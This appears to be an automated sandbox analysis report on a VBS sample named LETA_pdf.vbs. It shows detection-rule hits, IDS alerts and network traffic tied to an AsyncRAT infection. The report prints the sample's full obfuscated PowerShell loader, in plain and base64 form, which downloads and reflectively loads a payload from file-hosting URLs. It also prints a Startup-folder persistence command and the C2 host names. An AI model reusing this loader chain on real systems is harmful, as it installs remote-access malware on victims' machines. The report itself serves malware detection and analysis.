fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhR
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VC
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs", ProcessId: 2732, ProcessName: wscript.exe
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VC
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.187.200, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2732, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49707
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhR
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs", ProcessId: 2732, ProcessName: wscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')'), ProcessId: 1136, ProcessName: powershell.exe
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhR
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T20:33:32.055504+010020283713Unknown Traffic192.168.2.649708172.67.187.200443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T20:34:18.262876+010020355951Domain Observed Used for C2 Detected181.71.217.1144203192.168.2.649804TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T20:34:18.262876+010020356071Domain Observed Used for C2 Detected181.71.217.1144203192.168.2.649804TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T20:34:11.866457+010020576351A Network Trojan was detected108.181.20.35443192.168.2.649785TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T20:33:53.683441+010020490381A Network Trojan was detected142.215.209.78443192.168.2.649734TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T20:34:18.262876+010028424781Malware Command and Control Activity Detected181.71.217.1144203192.168.2.649804TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T20:34:11.866457+010028582951A Network Trojan was detected108.181.20.35443192.168.2.649785TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.6:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.6:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.6:49785 version: TLS 1.2

                        Spreading

                        barindex
                        Source: Yara matchFile source: LETA_pdf.vbs, type: SAMPLE
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

                        Software Vulnerabilities

                        barindex
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 181.71.217.114:4203 -> 192.168.2.6:49804
                        Source: Network trafficSuricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 181.71.217.114:4203 -> 192.168.2.6:49804
                        Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 181.71.217.114:4203 -> 192.168.2.6:49804
                        Source: Network trafficSuricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 181.71.217.114:4203 -> 192.168.2.6:49804
                        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.6:49734
                        Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 108.181.20.35:443 -> 192.168.2.6:49785
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 108.181.20.35:443 -> 192.168.2.6:49785
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.187.200 443Jump to behavior
                        Source: unknownDNS query: name: paste.ee
                        Source: unknownDNS query: name: deadpoolstart2025.duckdns.org
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                        Source: global trafficTCP traffic: 192.168.2.6:49804 -> 181.71.217.114:4203
                        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /zj1o07.txt HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                        Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                        Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
                        Source: Joe Sandbox ViewASN Name: ColombiaMovilCO ColombiaMovilCO
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 172.67.187.200:443
                        Source: global trafficHTTP traffic detected: GET /d/0jfAN HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                        Source: global trafficHTTP traffic detected: GET /d/0jfAN HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
